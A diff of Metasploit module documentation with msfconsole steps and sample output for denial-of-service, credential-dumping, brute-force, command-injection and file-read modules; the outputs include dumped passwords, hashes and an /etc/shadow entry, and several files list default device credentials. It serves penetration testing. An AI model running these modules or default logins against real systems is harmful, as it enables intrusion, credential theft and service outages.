00:01:32: %PLATFORM-1-CRASHED: Compiled Fri 20-Jul-07 01:58 by nachen
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Instruction Access Exception (0x0400)!
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
00:01:32: %PLATFORM-1-CRASHED: ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: CPU Register Context:
00:01:32: %PLATFORM-1-CRASHED: Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
00:01:32: %PLATFORM-1-CRASHED: LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
00:01:32: %PLATFORM-1-CRASHED: R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
00:01:32: %PLATFORM-1-CRASHED: R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
00:01:32: %PLATFORM-1-CRASHED: R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
00:01:32: %PLATFORM-1-CRASHED: R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Stack trace:
00:01:32: %PLATFORM-1-CRASHED: PC = 0x41414140, SP = 0x02DDEE80
00:01:32: %PLATFORM-1-CRASHED: Frame 00: SP = 0x41414141 PC = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:
```

29
documentation/modules/auxiliary/dos/rpc/rpcbomb.md Normal file
View File

@ -0,0 +1,29 @@
## Vulnerable Application
This module [exploits a vulnerability](http://openwall.com/lists/oss-security/2017/05/03/12) in rpcbind through 0.2.4,
LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.
Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.
## Verification Steps
1. Start msfconsole
1. Do: `use auxiliary/dos/rpc/rpcbomb`
1. Do: `set RHOSTS [IP]`
1. Do: `run`
1. Target should leak memory
## Scenarios
### rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)
```
msf > use auxiliary/dos/rpc/rpcbomb
msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7
msf auxiliary(rpcbomb) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(rpcbomb) >
```

43
documentation/modules/auxiliary/dos/smb/smb_loris.md Normal file
View File

@ -0,0 +1,43 @@
## Vulnerable Application
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
The module opens over 64,000 connections to the target service, so please make sure
your system ULIMIT is set appropriately to handle it. A single host running this module
can theoretically consume up to 8GB of memory on the target.
## Verification Steps
Example steps in this format (is also in the PR):
1. Start msfconsole
1. Do: `use auxiliary/dos/smb/smb_loris`
1. Do: `set RHOST [IP]`
1. Do: `run`
1. Target should allocate increasing amounts of memory.
## Scenarios
###
```
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >
msf auxiliary(smb_loris) > run
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
....
```

2
documentation/modules/auxiliary/gather/advantech_webaccess_creds.md
View File

@ -24,7 +24,7 @@ http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccess
## Verification Steps
1. Start msfconsole
2. ```use auxiliary/gahter/advantech_webaccess_creds```
2. ```use auxiliary/gather/advantech_webaccess_creds```
3. ```set WEBACCESSUSER [USER]```
4. ```set WEBACCESSPASS [PASS]```
5. ```run```

62
documentation/modules/auxiliary/gather/asterisk_creds.md Normal file
View File

@ -0,0 +1,62 @@
## Description
This module retrieves SIP and IAX2 user extensions and credentials from Asterisk Call Manager service.
Valid manager credentials are required.
## Vulnerable Application
[Asterisk](http://www.asterisk.org/get-started/features) offers both classical PBX functionality and advanced features, and interoperates with traditional standards-based telephony systems and Voice over IP systems.
This module has been tested successfully on:
* Asterisk Call Manager version 2.10.0 on Asterisk 13.16.0
* Asterisk Call Manager version 1.1 on Asterisk 1.6.2.11
The following software comes with Asterisk preinstalled and can be used for testing purposes:
* [FreePBX](https://www.freepbx.org/downloads/)
* [VulnVoIP](https://www.rebootuser.com/?p=1069)
Note that Asterisk will reject valid authentication credentials when connecting from a network that has not been permitted using the `permit` directive (or is specifically denied in the `deny` directive) in the Asterisk manager configuration file `/etc/asterisk/manager.conf`.
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/asterisk_creds`
3. Do: `set rhost <RHOST>`
4. Do: `set rport <RPORT>` (default: `5038`)
5. Do: `set username <USERNAME>` (default: `admin`)
6. Do: `set password <PASSWORD>` (default: `amp111`)
7. Do: `run`
8. You should get credentials
## Scenarios
```
[*] 172.16.191.229:5038 - Found Asterisk Call Manager version 2.10.0
[+] 172.16.191.229:5038 - Authenticated successfully
[*] 172.16.191.229:5038 - Found 9 users
Asterisk User Credentials
=========================
Username Secret Type
-------- ------ ----
100 sip
103 bbf5d449753391a sip
104 273db6cd9ca402f53354 iax2
105 secret password sip
106 "_" ;) iax2
107 123456789 sip
108 ~!@#$%^&*()_+{} sip
109 antidisestablishment iax2
123 y2u.be/VOaZbaPzdsk iax2
[+] 172.16.191.229:5038 - Credentials saved in: /root/.msf4/loot/20170723052316_default_172.16.191.229_asterisk.user.cr_798166.txt
[*] Auxiliary module execution completed
```

4
documentation/modules/auxiliary/gather/censys_search.md
View File

@ -9,9 +9,9 @@ The module use the Censys REST API to access the same data accessible through we
5: Do: `set CENSYS_DORK rapid7`
6: Do: `run`
## Sample Output
## Scenarios
#### Certificates Search
### Certificates Search
```
msf auxiliary(censys_search) > set CENSYS_DORK rapid7

82
documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md Normal file
View File

@ -0,0 +1,82 @@
## Description
This module opens a `devblocks_cache---ch_workers` or `zend_cache---ch_workers` file which contains a
data structure with username and password hash (MD5) credentials. The contents looks similar to JSON, however it is not.
## Vulnerable Application
This module has been verified against the following Cerberus Helpdesk versions:
1. Version 4.2.3 Stable (Build 925)
2. Version 5.4.4
However it may also work up to, but not including, version 6.7
Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/882596e791e54529b29ecbc6f48a6cb7-cerb5-5_4_4.zip)
* of note, 5.4.4 has to be installed on a PRE php7 environment.
## Verification Steps
1. Start msfconsole
2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure```
3. ```set rhosts [rhosts]```
4. ```run```
## Scenarios
### 4.2.3 using zend (not verbose)
```
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
[-] Invalid response received for 1.1.1.1 for /storage/tmp/devblocks_cache---ch_workers
[+] Found: admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
[+] Found: example:112302c209fe8d73f502c132a3da2b1c
[+] Found: foobar:0d108d09e5bbe40aade3de5c81e9e9c7
Cerberus Helpdesk User Credentials
==================================
Username Password Hash
-------- -------------
admin aaa34a6111abf0bd1b1c4d7cd7ebb37b
example 112302c209fe8d73f502c132a3da2b1c
foobar 0d108d09e5bbe40aade3de5c81e9e9c7
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### 5.4.4 using devblocks
```
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
rhosts => 192.168.2.45
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set targeturi /cerb5/
targeturi => /cerb5/
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
verbose => true
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
[*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
[+] Found: bar@none.com:37b51d194a7513e45b56f6524f2d51f2
[+] Found: foo@none.com:acbd18db4cc2f85cedef654fccc4a4d8
[+] Found: mike@shorebreaksecurity.com:18126e7bd3f84b3f3e4df094def5b7de
Cerberus Helpdesk User Credentials
==================================
Username Password Hash
-------- -------------
bar@none.com 37b51d194a7513e45b56f6524f2d51f2
foo@none.com acbd18db4cc2f85cedef654fccc4a4d8
admin@example.com 18126e7bd3f84b3f3e4df094def5b7de
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

87
documentation/modules/auxiliary/gather/http_pdf_authors.md Normal file
View File

@ -0,0 +1,87 @@
This module downloads PDF files and extracts the author's name from the document metadata.
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/http_pdf_authors`
3. Do: `set URL [URL]`
4. Do: `run`
## Options
**URL**
The URL of a PDF to analyse.
**URL_LIST**
File containing a list of PDF URLs to analyze.
**OUTFILE**
File to store extracted author names.
## Scenarios
### URL
```
msf auxiliary(http_pdf_authors) > set url http://127.0.0.1/test4.pdf
url => http://127.0.0.1/test4.pdf
msf auxiliary(http_pdf_authors) > run
[*] Processing 1 URLs...
[*] Downloading 'http://127.0.0.1/test4.pdf'
[*] HTTP 200 -- Downloaded PDF (38867 bytes)
[+] PDF Author: Administrator
[*] 100.00% done (1/1 files)
[+] Found 1 authors: Administrator
[*] Auxiliary module execution completed
```
### URL_LIST with OUTFILE
```
msf auxiliary(http_pdf_authors) > set outfile /root/output
outfile => /root/output
msf auxiliary(http_pdf_authors) > set url_list /root/urls
url_list => /root/urls
msf auxiliary(http_pdf_authors) > run
[*] Processing 8 URLs...
[*] Downloading 'http://127.0.0.1:80/test.pdf'
[*] HTTP 200 -- Downloaded PDF (89283 bytes)
[*] 12.50% done (1/8 files)
[*] Downloading 'http://127.0.0.1/test2.pdf'
[*] HTTP 200 -- Downloaded PDF (636661 bytes)
[+] PDF Author: sqlmap developers
[*] 25.00% done (2/8 files)
[*] Downloading 'http://127.0.0.1/test3.pdf'
[*] HTTP 200 -- Downloaded PDF (167478 bytes)
[+] PDF Author: Evil1
[*] 37.50% done (3/8 files)
[*] Downloading 'http://127.0.0.1/test4.pdf'
[*] HTTP 200 -- Downloaded PDF (38867 bytes)
[+] PDF Author: Administrator
[*] 50.00% done (4/8 files)
[*] Downloading 'http://127.0.0.1/test5.pdf'
[*] HTTP 200 -- Downloaded PDF (34312 bytes)
[+] PDF Author: ekama
[*] 62.50% done (5/8 files)
[*] Downloading 'http://127.0.0.1/doesnotexist.pdf'
[*] HTTP 404 -- Downloaded PDF (289 bytes)
[-] Could not parse PDF: PDF is malformed
[*] 75.00% done (6/8 files)
[*] Downloading 'https://127.0.0.1/test.pdf'
[-] Connection failed: Failed to open TCP connection to 127.0.0.1:443 (Connection refused - connect(2) for "127.0.0.1" port 443)
[*] Downloading 'https://127.0.0.1:80/test.pdf'
[-] Connection failed: SSL_connect returned=1 errno=0 state=unknown state: unknown protocol
[+] Found 4 authors: sqlmap developers, Evil1, Administrator, ekama
[*] Writing data to /root/output...
[*] Auxiliary module execution completed
```

53
documentation/modules/auxiliary/gather/teamtalk_creds.md Normal file
View File

@ -0,0 +1,53 @@
## Description
This module retrieves user credentials from BearWare TeamTalk.
Valid administrator credentials are required.
Starting from version 5, TeamTalk allows users to login using a username and password combination. The username and password are stored on the server in clear text and can be retrieved remotely by any user with administrator privileges.
## Vulnerable Application
[TeamTalk 5](http://www.bearware.dk/) is a freeware conferencing system which allows multiple users to participate in audio and video conversations. The TeamTalk install file includes both client and server application. A special client application is included with accessibility features for visually impaired.
This module has been tested successfully on TeamTalk versions 5.2.2.4885 and 5.2.3.4893.
The TeamTalk software is available on the [BearWare website](http://www.bearware.dk/) and on [GitHub](https://github.com/BearWare/TeamTalk5).
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/teamtalk_creds`
3. Do: `set rhost <RHOST>`
4. Do: `set rport <RPORT>` (default: `10333`)
5. Do: `set username <USERNAME>` (default: `admin`)
6. Do: `set password <PASSWORD>` (default: `admin`)
7. Do: `run`
8. You should get credentials
## Scenarios
```
[*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2)
[+] 172.16.191.166:10333 - Authenticated successfully
[+] 172.16.191.166:10333 - User is an administrator
[*] 172.16.191.166:10333 - Found 5 users
TeamTalk User Credentials
=========================
Username Password Type
-------- -------- ----
debbie 1234567890 1
murphy 934txs 2
quinn ~!@#$%^&*()_+{}|:" <>?;',./ 2
sparks password 2
stormy 1
[+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt
[*] Auxiliary module execution completed
```

4
documentation/modules/auxiliary/scanner/ftp/anonymous.md
View File

@ -57,9 +57,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
## Scenarios
### On vsFTPd 3.0.3 on Kali
### vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/anonymous

3
documentation/modules/auxiliary/scanner/ftp/ftp_login.md
View File

@ -47,7 +47,8 @@ This module will test FTP logins on a range of machines and report successful lo
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org

4
documentation/modules/auxiliary/scanner/ftp/ftp_version.md
View File

@ -47,9 +47,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
## Scenarios
### On vsFTPd 3.0.3 on Kali
### vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/ftp_version

13
documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md
View File

@ -1,4 +1,13 @@
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found.
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials.
There are four (4) default accounts:
1. root/root
2. admin/1
3. alg/1
4. user/1
In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file.
The module attempts to download configuration and password files depending on the login user credentials found.
## Verification Steps
@ -7,7 +16,7 @@ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Qual
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/binom3_login_config_pass_dump

59
documentation/modules/auxiliary/scanner/http/buildmaster_login.md Normal file
View File

@ -0,0 +1,59 @@
## Description
This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
## Vulnerable Application
[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
[Inedo website](http://inedo.com/)
## Verification Steps
1. Do: ```use auxiliary/scanner/http/buildmaster_login```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: Set credentials
5. Do: ```run```
6. You should see the module attempting to log in.
## Scenarios
### Attempt to login with the default credentials.
```
msf > use auxiliary/scanner/http/buildmaster_login
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
RHOSTS => 10.0.0.39
msf auxiliary(buildmaster_login) > run
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(buildmaster_login) >
```
### Brute force with credentials from file.
```
msf > use auxiliary/scanner/http/buildmaster_login
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
RHOSTS => 10.0.0.39
msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
USERPASS_FILE => ~/BuildMasterCreds.txt
msf auxiliary(buildmaster_login) > run
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test"
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test"
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong"
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong"
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(buildmaster_login) >
```

4
documentation/modules/auxiliary/scanner/http/chromecast_webserver.md
View File

@ -6,9 +6,9 @@ This module is a scanner which enumerates Google Chromecast via its HTTP interfa
2. Do: ```set RHOSTS [IP]```
3. Do: ```run```
## Sample Output
## Scenarios
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
```
msf > use auxiliary/scanner/http/chromecast_webserver

4
documentation/modules/auxiliary/scanner/http/chromecast_wifi.md
View File

@ -6,9 +6,9 @@ This module is a scanner which enumerates WiFi access points visible from a Goog
2. Do: ```set RHOSTS [IP]```
3. Do: ```run```
## Sample Output
## Scenarios
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
```
msf > use auxiliary/scanner/http/chromecast_wifi

2
documentation/modules/auxiliary/scanner/http/cisco_firepower_login.md
View File

@ -17,7 +17,7 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862
1. Make sure Cisco Firepower Management console's HTTPS service is running
2. Start ```msfconsole```
3. ```use auxiliary/scanner/http/cisco_firepower_login.rb
3. ```use auxiliary/scanner/http/cisco_firepower_login.rb```
4. ```set RHOSTS [IP]```
5. Set credentials
6. ```run```

3
documentation/modules/auxiliary/scanner/http/crawler.md
View File

@ -34,9 +34,10 @@ You can use any web application to test the crawler.
4. Do: ```set URI [PATH]```
4. Do: ```run```
## Sample Output
## Scenarios
### Example against [WebGoat](https://github.com/WebGoat/WebGoat)
```
msf> use auxiliary/scanner/http/crawler
msf auxiliary(crawler) > set RHOST 127.0.0.1

9
documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md
View File

@ -1,4 +1,9 @@
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to execute arbitrary system commands.
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
It requires any one of the following login credentials to execute arbitrary system commands:
1. admin/admin
2. installer/installer
3. home/home
## Verification Steps
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_cmd_exec

5
documentation/modules/auxiliary/scanner/http/epmp1000_dump_config.md
View File

@ -1,4 +1,5 @@
This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly. This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file.
This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly.
This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file.
## Verification Steps
@ -7,7 +8,7 @@ This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_dump_config

9
documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md
View File

@ -1,4 +1,9 @@
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to dump system hashes.
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
It requires any one of the following login credentials to dump system hashes:
1. admin/admin
2. installer/installer
3. home/home
## Verification Steps
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_dump_hashes

5
documentation/modules/auxiliary/scanner/http/epmp1000_web_login.md
View File

@ -1,4 +1,5 @@
This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials. Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly.
This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials.
Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly.
## Verification Steps
@ -7,7 +8,7 @@ This module scans for Cambium ePMP 1000 management login portal(s), and attempts
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/epmp1000_web_login

12
documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md
View File

@ -1,11 +1,13 @@
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration.
A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db.
This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
Vulnerable firmware versions include:
VMU-C EM prior to firmware Version A11_U05
VMU-C PV prior to firmware Version A17.
* VMU-C EM prior to firmware Version A11_U05
* VMU-C PV prior to firmware Version A17.
## Verification Steps
@ -14,7 +16,7 @@ VMU-C PV prior to firmware Version A17.
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/gavazzi_em_login_loot

5
documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
View File

@ -1,4 +1,5 @@
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability.
The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
@ -9,7 +10,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin

3
documentation/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.md
View File

@ -11,7 +11,8 @@ This module dumps memory contents using a crafted Range header and affects only
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125

5
documentation/modules/auxiliary/scanner/http/owa_ews_login.md
View File

@ -1,4 +1,5 @@
This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method.
This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS.
It is typically faster than the traditional form-based OWA login method.
## Verification Steps
@ -7,7 +8,7 @@ This module is for password guessing against OWA's EWS service which often expos
3. Set TARGETURI if necessary.
4. Do: ```run```
## Sample Output
## Scenarios
```
msf auxiliary(owa_ews_login) > run

57
documentation/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.md Normal file
View File

@ -0,0 +1,57 @@
This module exploits an authenticated arbitrary file read in the log module's filter engine.
## Vulnerable Application
The application is available for a 90 day evaluation after free registration from
[riverbed](https://www.riverbed.com/gb/products/steelhead/Free-90-day-Evaluation-SteelHead-CX-Virtual-Edition.html).
Downloads are available for Hyper-V, ESX(i), and KVM. Installation is straight forward, initial login is `admin`/`password`.
If need be from cli, to show the IP address of the device: `show interfaces primary`
This module was successfully tested against:
- SteelHead VCX (VCX255U) 9.6.0a
## Verification Steps
1. Do: ```auxiliary/scanner/http/riverbed_steelhead_vcx_file_read```
2. Do: ```set RHOSTS [IP]```
3. Set TARGETURI if necessary.
3. Set FILE if necessary.
3. Set USERNAME if necessary.
3. Set PASSWORD if necessary.
4. Do: ```run```
## Scenarios
### SteelHead VCX255u 9.6.0a running on ESXi
```
resource (riverbed.rc)> use auxiliary/scanner/http/riverbed_steelhead_vcx_file_read
resource (riverbed.rc)> set rhosts 192.168.2.198
rhosts => 192.168.2.198
resource (riverbed.rc)> set verbose true
verbose => true
resource (riverbed.rc)> run
[*] CSRF Token: 18PK64EKpo4d6y0X5ZOMYJ3fxfYZKfrN
[+] Authenticated Successfully
[+] File Contents:
admin:$6$sKOU5moa$B2szxiSEzq6ZmHZw01CMf64WlzvqIgCYETeXzF1ItxZ5soOJNVXdE2H5N19t0cPeGDf/LGvRymgQHAxgojr6u1:10000:0:99999:7:::
administrator:*:10000:0:99999:7:::
apache:*:10000:0:99999:7:::
localvixuser:*:10000:0:99999:7:::
named:*:10000:0:99999:7:::
nobody:*:10000:0:99999:7:::
ntp:*:10000:0:99999:7:::
pcap:*:10000:0:99999:7:::
postgres:*:10000:0:99999:7:::
rcud:*:10000:0:99999:7:::
root:*:10000:0:99999:7:::
rpc:*:10000:0:99999:7:::
shark:*:10000:0:99999:7:::
sshd:*:10000:0:99999:7:::
statsd:*:10000:0:99999:7:::
webproxy::10000:0:99999:7:::
[+] Stored /etc/shadow to /root/.msf4/loot/20170602230238_default_192.168.2.198_host.file_311580.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

3
documentation/modules/auxiliary/scanner/http/robots_txt.md
View File

@ -25,7 +25,8 @@ is extremely common.
You can set the test path where the scanner will try to find `robots.txt` file.
Default is `/`
## Sample Output
## Scenarios
```
msf> use auxiliary/scanner/http/robots_txt
msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238

70
documentation/modules/auxiliary/scanner/http/surgenews_user_creds.md Normal file
View File

@ -0,0 +1,70 @@
## Description
This module exploits a vulnerability in the WebNews web interface of SurgeNews on TCP ports 9080 and 8119 which allows unauthenticated users to download arbitrary files from the software root directory; including the user database, configuration files and log files.
This module extracts the administrator username and password, and the usernames and passwords or password hashes for all users.
## Vulnerable Application
[SurgeNews](http://netwinsite.com/surgenews/) is a high performance, fully threaded, next generation News Server with integrated WebNews interface.
This module has been tested successfully on:
* SurgeNews version 2.0a-13 on Windows 7 SP 1.
* SurgeNews version 2.0a-12 on Ubuntu Linux.
Installers:
* [SurgeNews Installers](http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgenews)
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/scanner/http/surgenews_user_creds`
3. Do: `set rhosts [IP]`
4. Do: `run`
5. You should get credentials
## Scenarios
```
msf > use auxiliary/scanner/http/surgenews_user_creds
msf auxiliary(surgenews_user_creds) > set rhosts 172.16.191.133 172.16.191.166
rhosts => 172.16.191.133 172.16.191.166
msf auxiliary(surgenews_user_creds) > run
[+] Found administrator credentials (admin:admin)
SurgeNews User Credentials
==========================
Username Password Password Hash Admin
-------- -------- ------------- -----
admin admin true
qwerty@bt {ssha}BuFLjIFUUSy1IltX3AuN420qV2ZFU7EL false
